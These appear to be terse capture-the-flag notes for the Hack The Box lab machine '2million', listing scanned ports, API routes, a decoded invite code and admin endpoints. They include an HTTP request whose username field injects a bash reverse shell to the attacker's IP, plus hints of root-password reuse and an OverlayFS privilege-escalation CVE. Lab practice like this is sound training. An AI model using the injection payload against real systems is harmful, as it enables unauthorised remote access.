IP: 10.10.11.221

Discovered open port 80/tcp on 10.10.11.221
Discovered open port 22/tcp on 10.10.11.221

domain: 2million.htb
routes:

"/api/stats/daily/owns/" + t
"/api/stats/global"
"/api/users/htb/connection/status?api_token=" + t
"/api/machines/ping/" + t + "?api_token=" + e
"/shouts/support/get/html/" + t + "?api_token=" + e
"/api/shouts/support/new/?api_token=" + e
"/api/shouts/team/get/html/" + t + "?api_token=" + e
"/api/shouts/team/new/?api_token=" + e
api/v1/user/login
/login
/logout
/register
/invite
/js/inviteapi.min.js
/api/v1/invite/verify

Javascript file with routes: /js/htb-frontpage.min.js
Javascript file: /js/htb-frontend.min.js

Data: Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr

Decoded: TAYQV-IOWJZ-U9DXX-MGS74


Valid routes inside the website:
/home
/home/rules
/home/changelog
/access
/api/v1/user/vpn/generate
/api/v1/user/vpn/regenerate


remote edge-eu-free-1.2million.htb 1337



admin	
GET	
/api/v1/admin/auth	"Check if user is admin"
POST	
/api/v1/admin/vpn/generate	"Generate VPN for specific user"
PUT	
/api/v1/admin/settings/update	"Update user settings"



POST /api/v1/admin/vpn/generate HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://2million.htb/home/access
Cookie: PHPSESSID=6sq3ogsj8is8muclinsns0anrp
Upgrade-Insecure-Requests: 1
Content-Length: 80

{
	"username": "teste;bash -c 'bash -i >& /dev/tcp/10.10.14.29/1337 0>&1' #"
}

ls -la

.env root password

https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/
